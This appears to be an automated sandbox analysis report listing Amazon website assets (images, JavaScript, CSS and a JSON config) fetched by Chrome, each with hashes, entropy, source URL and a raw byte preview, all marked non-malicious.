                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aa2Q.q..#%3brt.......s....BT.......................................................1!.."aq..Q..23AR.............?...R.%.)J.JR.R....(.)X.^l$G...\.."i.E.7....C......Pr..s.D.+\G. .$.\{oy.?...u..,....T,1.Snv..#<.Ac..A..Kw>h.u.2...C.F.......=C..H...i..)JP.JR.R....(.)J.JR.R..9..\....~'....Fn..un.W.~...P..Y-.U..J...m<...:jW........J.....Rv.69.?.......),q=.....~......:l.JFp2.`{...*...Kna.A...__..(U.Hoa...0%@p.1.~k......A........Ve..t.._..([vQ.JR..R......+.c#wo_S.\....)Z...s....[k{.ayd1.-...bQ:.>U..u..;_.F.?.*7..j.Z....14x.k.ob. ...5.o.._.^?.u=].5..'..#$a6............c.JU.2......$.H1...I;.........xr..r.#.:.......a.W:.3.+.m.-,R@...pU..qT....}M....k.pyK.F...3/.$.`G...!.[....dx......)...z6....~.Z][...eS.c....U".......,.\'.......7C.0@$z.Vu`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11483
                                                                                                                                                                                                        Entropy (8bit):7.822734923261984
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:fJHC+Xf28JSIr+2zn3EPTUY2BYVKBcyUT2XvTq3+vORNILR5/mazOa:f88OXK+2zUPmyyBXW3+GRNWf/map
                                                                                                                                                                                                        MD5:89F0804DFFBD843C79E6ABD69E440CA2
                                                                                                                                                                                                        SHA1:23703A46D1422240E7F9221FC4ED3189603B4A7E
                                                                                                                                                                                                        SHA-256:72C208D0516125DAD284B8D649812A31023424B6B1C256CD8FB5EB4253A591FC
                                                                                                                                                                                                        SHA-512:77EE72A317D6D7675D537BADFE7C503654CC71B042585CC2D1525B31D2959033FDD1D3211AD1BDEF3623140259DCC2DAD8EC23895C9ECCE221073D7118FC6C4B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31nHAvUNnpL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3...................................................................................!...............l.X.@{.....................6.F?........X|......h..o%.....................,.j..CY.eX...=.2..A.{yR`...S.N.:#..........................MCKY.n...m..C_...5...+.~..........[.;>.K0.@...............Y..i.:gth.H...8.nQ.s..q..YY.i......z&y}.....k..................a....Z?yh.g.|3I.K...s.-{.OW......4w\...,.5,..?.O...X................k...F.{.D..QM..*l>.m..tng.Wj?/O3u.V..&t..D.u}...h.................p..t...F....u.oN~MGe.Z.3V.4.}........$.H>p}%...................!....s.As...<.....\..O(......1^..bI.......:................\p....9..@. F...Y..d..I.4Y'...J.jD...................tn...X...R.O..n.k%.zL.'d.I.n}$......................~..#....=e@.X.J.zz.wc..?.e..2.I>l.(.......A..f..8...........U..pn...|=!.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (868)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):45047
                                                                                                                                                                                                        Entropy (8bit):5.6295063775589975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:93gH7LGLsefSvvGeH7uRcWxcxoxXkDIIxrxtiXxq:KIsef+ixcxox0UIxrxyxq
                                                                                                                                                                                                        MD5:0609C804B4AF3A5B7AAF2625FA534FAB
                                                                                                                                                                                                        SHA1:C38C215156EF69FD048740BC5204E69D211068DB
                                                                                                                                                                                                        SHA-256:1017F870F22A6E6263DEDD0BE6D31FCC6DB9762F9540EAF31EE827B710A76D7B
                                                                                                                                                                                                        SHA-512:D6F316E751509E9CE01ECA64AF78473D87FC2E70F3B3F027A222D812FF1CF67585ABEB5B73534A388D4FEBB392667AC203A6F0832EE6E19325BCDC4D633A4B27
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/01B3Yme5dLL._RC%7C01j5DeZSMzL.js,51M-SaPaAgL.js_.js?AUIClients/ALMCartActionAssets&X7ecmQ3Q"
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ALMSavingsAssets@core","ALMSavings"):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ConsumablesATCActionAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(e){var g=window.AmazonUIPageJS||window.P,n=g._namespace||g.attributeErrors,q=n?n("ALMCartActionAssets",""):g;q.guardFatal?q.guardFatal(e)(q,window):q.execute(function(){e(q,window)})})(function(e,g,n){function q(c,b){try{e.register(c,b)}catch(d){if(!d.message.includes("reregistered by ALMCartActionAssets"))throw d;}}function E(){var c=arguments;return{register:function(b,d){try{e.when.apply(e,c).register(b,d)}catch(a){if(!a.message.includes("reregistered by ALMCartActionAssets"))throw a;.}}}}e.when("ALMCar
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1994)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3857
                                                                                                                                                                                                        Entropy (8bit):5.025490419210117
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ZOW9K93Ye93YXOV8OV693YmOVgOV693YGOPOrODz93YkODz93Y/OWODz93YoBCoN:ZOWQNYeNYXOV8OV6NYmOVgOV6NYGOPOZ
                                                                                                                                                                                                        MD5:C94EC8544D1C0AD138328C6662A94F55
                                                                                                                                                                                                        SHA1:757521F39E78FC59C8F2BE7318143DCDA904C0D4
                                                                                                                                                                                                        SHA-256:BBAB353044CF5613F41E04BB659C16C06BA56B1F549E12B43B1ED555284AA6BD
                                                                                                                                                                                                        SHA-512:44C6195CBCB65E1F3A1543E12E45C385BB9795241BF65FCA8C087F9B6DD9872EA322574436D36604A3C96D1011BA6FEAC2704DA63712C647F95E2134D3CF84F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/11Q6G8iTFZL.css?xcp
                                                                                                                                                                                                        Preview:._cropped-image-map_style_cropped-image-map__3oVAB{height:600px}._cropped-image-map_style_fluid-image-map-container__3GBMh{height:100%;overflow:hidden;position:relative;width:100%}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{height:100%;left:-9999px;margin:auto;max-width:none;position:absolute;right:-9999px;width:1500px}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu img{height:100%}@media (max-width:767px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:368px}._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA ._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{width:919px}}@media (min-width:768px) and (max-width:919px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:470px}._croppe
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (26050)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):211782
                                                                                                                                                                                                        Entropy (8bit):4.994172446365422
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:gnH2o3pouSXmkglKEKajAQlkEXZKt4ReJRYMsj3rzud:gnHcYMsjvud
                                                                                                                                                                                                        MD5:E4A8ABC219804CC2EB2E7CC13DE87DCF
                                                                                                                                                                                                        SHA1:8C3F139587C2801512665FEF41DA6D2A38DBA8BB
                                                                                                                                                                                                        SHA-256:4D1C6C4BCC378956DCED3A7F15CB34D3E0DA99C0E7DF60CB6DC0A0E787C1F138
                                                                                                                                                                                                        SHA-512:559C0A8AD63791F18B864BF9815EEE737D514E6B55DC1F910C3DF0422821350F1B37A232DBF81A3344CE4C40E1C51A358419231B79FB6B131756AC7E70DD806A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P"
                                                                                                                                                                                                        Preview:button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h2.a-spacing-none,h3.a-spacing-none,h4.a-spacing-none{padding-bottom:0}h1 .a-size-base,h1 .a-size-mini,h1 .a-size-small,h1.a-size-base,h1.a-size-mini,h1.a-size-small,h2 .a-size-base,h2 .a-size-mini,h2 .a-size-small,h2.a-size-base,h2.a-size-mini,h2.a-size-small,h3 .a-size-base,h3 .a-size-mini,h3 .a-size-small,h3.a-size-base,h3.a-size-mini,h3.a-size-small,h4 .a-size-base,h4 .a-size-mini,h4 .a-size-small,h4.a-size-base,h4.a-size-mini,h4.a-size-small{padding-bottom:0}h1,h2{padding-bottom:4px}h3,h4{padding-bottom:4px}.a-size-medium .a-row.a-size-base,h1 .a-row.a-size-base,h2 .a-row.a-size-base,h3 .a-row.a-size-base,h4 .a-size-large .a-row.a-size-base{padding-top:1px}.a-size-base .a-row.a-size-base{padding-top:0}.a-size-micro{font-size:10px;l
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1493)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1567
                                                                                                                                                                                                        Entropy (8bit):5.297390366078816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:jhsvTFlXa3MBTx4HjFt4q/fZMM7Mu+SQD:Vo5aPjb/3j+hD
                                                                                                                                                                                                        MD5:1C5038600EED077C89FD6F9ADE5AF844
                                                                                                                                                                                                        SHA1:E95B9E29276248780E513A4851932A40955BAF2A
                                                                                                                                                                                                        SHA-256:73B668D63458F1801E0EC049EAB30C8B88C76E318D5C70785DDA53D916D90AAC
                                                                                                                                                                                                        SHA-512:4089AF7150108CDEA4467EF083B84CFCEC98F7BFC6A744288F911A640CBC45F0AD67703E58627AFE8B14CC55DF76699EB7748DD6E7CF3533A2942150DDAF0228
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/01n49fullPL.js
                                                                                                                                                                                                        Preview:(()=>{"use strict";var e,r={},t={};function o(e){var n=t[e];if(void 0!==n)return n.exports;var i=t[e]={id:e,loaded:!1,exports:{}};return r[e].call(i.exports,i,i.exports,o),i.loaded=!0,i.exports}o.m=r,e=[],o.O=(r,t,n,i)=>{if(!t){var l=1/0;for(u=0;u<e.length;u++){for(var[t,n,i]=e[u],a=!0,d=0;d<t.length;d++)(!1&i||l>=i)&&Object.keys(o.O).every((e=>o.O[e](t[d])))?t.splice(d--,1):(a=!1,i<l&&(l=i));if(a){e.splice(u--,1);var s=n();void 0!==s&&(r=s)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[t,n,i]},o.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return o.d(r,{a:r}),r},o.d=(e,r)=>{for(var t in r)o.o(r,t)&&!o.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},o.g=function(){if("object"===typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"===typeof window)return window}}(),o.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),o.r=e=>{"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.definePropert
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3872
                                                                                                                                                                                                        Entropy (8bit):4.401635005544287
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:AMHaubkbWBp30kbtxwOjWzHdEjMvUcbuV6qxvaRb:vtvBd04Wz92qDuV6evaRb
                                                                                                                                                                                                        MD5:AA37F93E3E73F2178BF82DEB44F4FE8F
                                                                                                                                                                                                        SHA1:D111A59E726422D396E700E2232268350F5AE50C
                                                                                                                                                                                                        SHA-256:B9CBDABD491B252B7D79A933B276174FE1083363CB5F4EF5729CE18159B6520C
                                                                                                                                                                                                        SHA-512:F10EE525362065DA52116EB74A4C9B7FCE631379BC83B82B6A98358C41C00A48AC99C1F0917078ADAF49EE0D5BFAA5CC7C579B152ACD7FEE6B5053EF1A591915
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://d2h8zr0m6mus4x.cloudfront.net/primesignup/package.json?_=1723729138736
                                                                                                                                                                                                        Preview:{. "version": "v1",. "root": {. "static": "https://d2h8zr0m6mus4x.cloudfront.net/primesignup",. "dynamic": "/wlp/prime". },. "domain": {. "us": "https://www.amazon.com",. "uk": "https://www.amazon.co.uk",. "ca": "https://www.amazon.ca",. "de": "https://www.amazon.de",. "es": "https://www.amazon.es",. "fr": "https://www.amazon.fr",. "it": "https://www.amazon.it",. "jp": "https://www.amazon.co.jp",. "in": "https://www.amazon.in",. "cn": "https://www.amazon.cn",. "sg": "https://www.amazon.com.sg",. "mx": "https://www.amazon.com.mx",. "ae": "https://www.amazon.ae",. "br": "https://www.amazon.com.br",. "nl": "https://www.amazon.nl",. "au": "https://www.amazon.com.au",. "tr": "https://www.amazon.com.tr",. "sa": "https://www.amazon.sa",. "se": "https://www.amazon.se",. "pl": "https://www.amazon.pl",. "eg": "https://www.ama
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12513
                                                                                                                                                                                                        Entropy (8bit):5.434628844075745
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Q4IPhv98IxQ8I62eZIFxFXwFacRLQl7DFc/WY7//mXDsBRYK:yPhv9txVIje5RLQl7i/visXX
                                                                                                                                                                                                        MD5:47539E88D4690AB67703ABD383E7B3DF
                                                                                                                                                                                                        SHA1:A901C87377138063B884A6ED9173F1CC142A67B5
                                                                                                                                                                                                        SHA-256:6733522B047B40AAC2DA228652E13FFAEDD219D2EB491D2EFF0BA004E7D189C5
                                                                                                                                                                                                        SHA-512:87DE7FED7ABCD7916BC96B26495B47272A2F6B04640C5D79550C990E21694D3ED2544D4DB315E84151A033330D6F65D13206E426960355078E2982D8492A927A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(m){var r=window.AmazonUIPageJS||window.P,w=r._namespace||r.attributeErrors,q=w?w("QuantitySliderAssets",""):r;q.guardFatal?q.guardFatal(m)(q,window):q.execute(function(){m(q,window)})})(function(m,r,w){function q(t,n){try{m.register(t,n)}catch(f){if(-1===f.message.indexOf("reregistered by QuantitySliderAssets"))throw f;}}function y(){var t=arguments;return{register:function(n,f){try{m.when.apply(m,t).register(n,f)}catch(h){if(-1===h.message.indexOf("reregistered by QuantitySliderAssets"))throw h;.}}}}m.when("QuantitySliderAssetDuplicationGuard").execute(function(t){t.when("A","quantity-slider-utils","qs-cart-update-utils").register("qs-cart-update-handler",function(n,f,h){function l(a){p||(p="quantity-slider-widget-"+a);return p}function e(a,b){if(!b.atcFormSubmitDisabled){if((a=a.$target&&a.$target.closest(".qs-atc-form"))&&0!==a.length)return a;m.log("Missing $form object","ERROR",l(b.clientName))}}function b(b,x,k){n.trigger(f.ACTIONS.ADD_TO_CART_SUBMIT_START,{asin:b,cartT
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):58623
                                                                                                                                                                                                        Entropy (8bit):7.875674719603265
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:4nld8BxE38orvWzvy8GzMZ0XzKoUgpeObmSzraJypu:4zDnrvAvy8GzI0XD/plzWJ6u
                                                                                                                                                                                                        MD5:8ABD97978296C8EEE78E3744E858E309
                                                                                                                                                                                                        SHA1:E9F3986067AFD3149BA8ADF97DFFA6E3F739943E
                                                                                                                                                                                                        SHA-256:40851D0EB9E79CC5F717AFD85A828D581AA039E6D4D537A1F0E65AD3EE39932A
                                                                                                                                                                                                        SHA-512:189FEA09812555CD30855F3A76B8FA5A8D9DDA085D9ACF56867F90038304EEE5163CD82345EA32D6EA6CA381A7B3F85BA0ACF8C15975A3EF318E63F3525AD421
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 194x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17386
                                                                                                                                                                                                        Entropy (8bit):7.971713661182734
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:JUcmXhN6RZjXoTPqp55WLsiezBAL7qxANuVjAKh+Yd:EcJUPq/5Li13wd
                                                                                                                                                                                                        MD5:EB75FB05C12CD16CF99139F3C55A3FFF
                                                                                                                                                                                                        SHA1:631713C03B4CB099AD5DE773EB71C2D479D05365
                                                                                                                                                                                                        SHA-256:29584E56D34D57493839A07B2067668192037DF524FC7E4443752754D26622BA
                                                                                                                                                                                                        SHA-512:94A949D056A156AA27087B4DD6201ECE0AE51157232D417A4FAEFF14FCC413CE2FA04811F8469549A81B044E52DB427FFAACACAB858F781C31A06831508D56F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1"A..Q2Raq..#B..$3CS..DUb....%...4Tru......................................................!1..."Aaq..2Q.....#b....B....C.............?..n..a.B`.E.....0D@n;..G.......0.f.z........1~0J.y.}i....%$.#.5ZF.;...`0.....u.oG..L..x.kz.W..e......O...[..!...W.N.....}....De....s...X.}GIB......>../u...J......U...Bwx.3X.=)........p.@n$w..h..?..2..B/...9-....DQ)7.. D..fU...C.=.......R....R......a.m.#n.....se..Sc...u.m...."..F!. .\..<.......S<.......)...X..x.7..>..R..|........c...5.K.... D.I.y.~...3o....<s...h&C.^.}X.].<d2.qC.......W...|.bM.{pG.....Q7y...U7O...^.&..~.D.q*.......#R.e.q.N.....G^..M.+..........O...s.m...Z...X.\..Ct.r...97.[T"...S..=...~.w..d.N..FP.....u...V...[..p_....}.Hu"n...jZ.N.ar..Y.9.(...<. .o.X........h.V.W.(.,.......w*@..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 210x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4849
                                                                                                                                                                                                        Entropy (8bit):7.89645817157679
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TbABxNhXU5e4L9iVOSu06t5R2SI38OuG3VhlizrbjD9x+OhYn:/ADMe4AOwhmXvLhY
                                                                                                                                                                                                        MD5:7BFA58FE034D5BF30E21C42578300BB0
                                                                                                                                                                                                        SHA1:A87B223B4BDB5C40C0B8E9AE0A540B197E69BEF5
                                                                                                                                                                                                        SHA-256:1C137F202B660C8E6BFEE0C46528F6B7127F93784357672374BF7B6CC1DF484D
                                                                                                                                                                                                        SHA-512:A8170F57E0495AA0BE62B408BC32FD9EAA4678D8FC000CD3759CBAE823E6EC9DC39A6F30F1BD3DC1878775E4F129AF1DC7191C7A09911C6FEEA73F2932B133F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51mS5FhRwRL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!1A.46Qqr..."3ast..#2....b...BS...$CR.............................................1..!QR............?...$.........e...x8...?5.....y........6......k7.8........-A6..v-M....X..x...k.J..nLVg..%...K.V;.6...g.(5#..Q..Z6.}..\F.bZ......|.q...=.1...K..&...............pQz.rU\.e6.6.w....i.....(1(vbXt3..\.:..<M.....#4f.eI....^.#(Z..........N:/.WAQ.V..... .a.1..4.7.m.q.i.?..Q.u..s.'...2Q#........7..;KaY..@w..=....F..'.......... ....V.P..`....>.0.f....;.s.)?m...j..B..B..B..B..B..B..B...z3.|.O....t.Y...F..V.Yj.F0.i..y.o.*..ED@..?......*.........)Q?..Z......{7..l,.M*].{...Q. t...r.C.',MX.1..'.L.l.FP:,k...Gj.aX.~..j..c..g.|..XF..-./]ZGCa,.U|X.....U...@@..A#=.N?GrEk.K58...f%O.SAWJ.$S09..A....b..Y.FB.........Y.... .. .. .. .. .k;.8.............?.5^B..j
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 155x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                        Entropy (8bit):7.885864424653992
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TfkGHn33dF42T6KAOZgKp93hdXuKiE+IBJN:win3/v6kZ93h0K3l
                                                                                                                                                                                                        MD5:AAC1D24D179EB30264CC3900865E0300
                                                                                                                                                                                                        SHA1:68A2E4FCF6A0E3F7161AB0C6DD8C6C89454AE973
                                                                                                                                                                                                        SHA-256:990C4C79BD39FEA4255AA564351502EBFB30E4C381959CC9DA0214C9B0C8115B
                                                                                                                                                                                                        SHA-512:2F3236E9243D11812B1E0EC2807619A0E6083EC32978D83BCE029F3EA466898396AAC7245D0A5553E5A56FA95B64F8999712EF5E5AD1CD4226CD8822E7FC620D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71-zL81AiAL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!1RTst......"25AQSUbr...%aq.......B.#$&C.46D............................................!..............?......Y3bo...\|..n?@..O{.e.,....p@>.C..d.w.*._o.3<.....-k\@h.4x.....<.y[..w...>T^'{...;..m..hkB...>..O...?.R..O..<..[......}..9Et...n.......)M....(z.g(.......@.....}..+M.._...P7Z..'9.[......t..R............W.$..;mY.$...[.......4......=&M%.{oY.d....2s......=!S.d.Ho.OHT..t..7...'<....'=.[.....R.$7..*.T.kP..|..)..|..(...o.....r.M.T...=....w.p{3.]...t7.....'<..z../<.z.....}s!l.....1.>..O..%[W..r4....v.y!w6.U..d..Z._+..{.dy.......@.X.P...{.q.UXd...${@.f..>6...+.X../\z..Un......^....y..G.i.;.}.....(...w..I.......$QK...Vh%-.......%....[.....V."...y].n.L..s...)@0o......[.4TA@.o...)po..%!@{.!...;.!.........h...*P..p...p
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23454
                                                                                                                                                                                                        Entropy (8bit):7.960066050617329
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                        MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                        SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                        SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                        SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg
